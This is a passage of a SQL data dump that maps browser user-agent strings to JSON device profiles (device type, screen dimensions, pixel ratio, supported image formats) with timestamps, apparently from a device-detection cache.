Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707225485),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A135F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690187550),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S916B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1697784194),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A516U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689749298),('Mozilla/5.0 (Linux; Android 12; SM-M135F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707559821),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698204910),('Mozilla/5.0 (Linux; Android 13; RMX3392) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689862991),('Mozilla/5.0 (Linux; Android 13; RMX3392) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689862991),('Mozilla/5.0 (Linux; Android 11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689881366),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1693029997),('Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64) Opera 10.62','',1689956557),('Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1697816124),('Mozilla/5.0 (Linux; Android 13; SM-A546B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690005315),('Mozilla/5.0 (Linux; Android 13; 2201117SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1739968170),('Mozilla/5.0 (Linux; Android 13; SM-T575) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690009000),('Mozilla/5.0 (Linux; Android 13; SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690010263),('Mozilla/5.0 (Linux; Android 13; 2201116PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690013602),('Mozilla/5.0 (Linux; Android 13; SM-M127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690014289),('Mozilla/5.0 (Linux; Android 13) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690023099),('Mozilla/5.0 (Linux; Android 12; VNE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690026343),('Mozilla/5.0 (Linux; Android 13; SM-M336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690031413),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A546B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1701962727),('Mozilla/4.0 (compatible; MSIE 8.0; Windows xx; Trident/6.0)','',1690553672),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A137F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690571208),('Mozilla/5.0 (Linux; Android 9; KFTRWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690607504),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690772152),('Mozilla/5.0 (Linux; Android 11; SM-X200) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":879,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690810096),('Mozilla/5.0 (Linux; Android 10; ANA-NX9; HMSCore 6.11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690911519),('Mozilla/5.0 (Linux; Android 10; HarmonyOS; DBY-W09; HMSCore 6.11) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1691080420),('Mozilla/5.0 (Linux; Android 13; 2107113SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692026981),('Mozilla/5.0 (Linux; Android 7.*; xx Note 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692401417),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G736B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692553653),('Mozilla/5.0 (Linux; Android 12; SM-G781W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705103978),('Mozilla/5.0 (Linux; Android 11; 220333QNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1693414236),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-F936B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":589,\"screenHeight\":736,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707765598),('Mozilla/5.0 (Linux; Android 10; ANA-NX9; HMSCore 6.10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1694589738),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S911B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708770020),('Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko; compatible; GoogleOther) Chrome Safari/*','',1746402652),('Mozilla/5.0 (OS/2; Warp 4.5) Gecko/* Firefox/*','',1746880870),('Mozilla/5.0 (Linux; Android 11; NAM-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1695651409),('Mozilla/5.0 (Linux; Android 13; Redmi Note 12 Pro+ 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1696163653),('Mozilla/5.0 (Linux; Android 11; LM-V500N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1696329772),('Mozilla/5.0 (Linux; Android 8.*; Moto G (4)) AppleWebKit/* (KHTML like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747512030),('Mozilla/5.0 (Linux; Android 12; 22101316G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1733512351),('Mozilla/5.0 (Linux; Android 8.*; vivo X21A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1697984974),('Mozilla/5.0 (iPhone; CPU iPhone OS 17 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1731477429),('Mozilla/5.0 (Linux; Android 12; M2010J19SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698249714),('Mozilla/5.0 (Linux; Android 13; 23021RAA2Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698311291),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-F721B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1699130927),('Mozilla/5.0 (Linux; Android 12; I2126) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1699478854),('Mozilla/5.0 (Linux; Android 12; 22111317G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1719500197),('Mozilla/5.0 (Linux; Android 8.*; vivo X21A) AppleWebKit/* (KHTML, like Gecko) Chrome','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1699571966),('Mozilla/5.0 (Unknown; UNIX BSD/SYSV system) AppleWebKit/* (KHTML, like Gecko) QupZilla/1.7 Safari/*','',1733106329),('Mozilla/5.0 (Linux; Android 13; Redmi Note 10 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1700624146),('POLARIS/6.01 (BREW 3.1; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1','',1700949225),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1703870406),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1701537810),('Mozilla/5.0 (Linux; Android 14; Pixel 7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1701669718),('Mozilla/5.0 (Linux; Android 12; 22101316UG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1701867437),('V802SE/SEJ001 Browser/SEMC-Browser/4.1','',1702304262),('Mozilla/5.0 (Android 14; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747501651),('Mozilla/5.0 (Linux; Android 14; SM-S901B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1738331862),('Mozilla/5.0 (Linux; Android 14; SM-A536B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721148690),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A346B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1706283032),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A536B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1711221879),('Mozilla/5.0 (Linux; Android 14; SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1723813841),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A546B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1715514410),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-S916B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1711132806),('Mozilla/5.0 (Linux; Android 14; SM-S911B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1735377737),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1704572702),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-S908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705738736),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-S918B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705174450),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705237925),('BrightSign/9.0 (LS445) Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/* (KHTML, like Gecko) QtWebEngine/5.15 Chrome Safari/*','',1710692382),('Autoplius.lt/7.7 Mozilla/5.0 (iPhone; CPU iPhone OS 17 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','',1710692385),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-G990B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1706276112),('Symfony BrowserKit','',1747102220),('Mozilla/5.0 (Linux; Android 10; zh-Hans-CN; SPN-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Quark/5.4 Mobile Safari/*','',1706189166),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A136B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1706690543),('Mozilla/5.0 (Linux; Android 14; SM-A546B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1745761181),('Mozilla/5.0 (Linux; Android 14; SM-S908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":892,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1728549744),('Mozilla/5.0 (Linux; Android 14; SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747567284),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707490954),('Mozilla/5.0 (Linux; Android 10; ELS-NX9; HMSCore 6.13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1713615001),('Mozilla/5.0 (Linux; Android 14; SM-A346B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707753989),('Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708539178),('Mozilla/5.0 (Linux; Android 13; SM-A135F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708674749),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1709116294),('Mozilla/5.0 (Linux; Android 14; 23078PND5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717685947),('Links/0.9 (Linux 2.4; i386)','',1709372645),('Mozilla/5.0 (Linux; Android 5.*; Redmi Note 3) AppleWebKit/* (KHTML, like Gecko) OPR Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1709461007),('Lotus-Notes/4.5 ( Windows-NT)','',1709615899),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718992541),('Mozilla/5.0 (Linux; Android 13; SM-S911U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1710270007),('Mozilla/5.0 Autopliuslt/7.8 EmbeddedBrowser (iPhone; CPU iPhone OS 17 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: VendorUID: AppPkgID: lt.plius.auto','',1710692315),('Mozilla/5.0 (Linux; Android 13; SM-F936B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 